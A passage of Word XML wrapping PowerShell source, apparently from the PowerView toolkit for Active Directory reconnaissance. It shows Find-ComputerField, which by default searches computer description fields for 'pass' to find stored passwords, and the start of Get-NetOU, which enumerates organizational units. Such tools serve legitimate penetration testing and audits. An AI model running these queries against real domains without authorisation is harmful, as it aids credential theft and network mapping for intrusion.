    <w:p w14:paraId="2355DD85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Taken directly from @obscuresec's post:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FEA6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5370E010" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C50B3CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchTerm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0ED88D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67967695" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Term to search for, default of "pass".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12501869" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25C5254D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734B472" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5BFB391A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        User field to search in, default of "description".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA836B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27208C12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA4D1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E5CD1FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F08DD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E03C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29633286" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D95FA9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DBC8B96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to search computer fields for, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543F3ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AF19D4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C2A0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53560C76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728FF9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AE2B6FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16933EBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29DA93EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169DEF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="159A6FFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6E55F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="495A4AA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE93AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A437BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64FAB947" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A2C96A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D159B35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-ComputerField -SearchTerm backup -SearchField info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F026D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="380E91DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find computer accounts with "backup" in the "info" field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FEDF58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB09CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D44380C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26E2C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D6AB89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F65EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Term')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F766062" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C726F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchTerm = 'pass',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649ED634" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C8C667A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Field')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71442B23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37CF3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchField = 'description',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15EB76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12F716B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E2B7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0247342E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00A96D0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC9693B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD707A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="474D1E7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749730D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739B857" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C61D4C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C6A60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F9B26E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403ED95D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46258F7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FEA2ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BD22E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF00832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65776D08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319ECA50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetComputer -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C422F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D8D7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A99349" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="198404B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78B5352B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetOU {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC5B346" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B599F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A16C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59B7DCD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of all current OUs in a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F8E5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D25DF26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OUName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EEB2C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="404CA35A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The OU name to query for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57239C98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C3B5873" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBCF676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B480007" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return OUs with the specified GUID in their gplink property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143613B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="799F2107" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C309AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D56D657" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for OUs, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27698CB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="174727E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2E5AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78C1AAA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCF18F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="438BBE9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C4155" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E0351D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70677786" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C614864" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B22EFC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1655A220" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return full OU objects instead of just object names (the default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3970A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CA2A383" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766795F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7EF0A8C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7187ACF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D025A83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E574002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="543F86A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241CE300" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D2AEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CA49B37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E37403" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7DE65833" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetOU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D296D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F06DD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the current OUs in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB1FD56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A50A33B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02930A38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DFBBC84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetOU -OUName *admin* -Domain testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7BFA4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383E77D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all OUs with "admin" in their name in the testlab.local domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87AC4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22E9C6DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7ECB4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="044A1999" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetOU -GUID 123-...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C4C725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1891A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all OUs with linked to the specified group policy object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297E0B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0794F034" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFA9F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74B78573" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; "*admin*","*server*" | Get-NetOU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F877334" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A5B776B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the full OU names for the given search terms piped on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201226F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092B8A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47C24DE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0432BCEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2986CA88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314959B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC18C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OUName = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E557E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EF29126" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
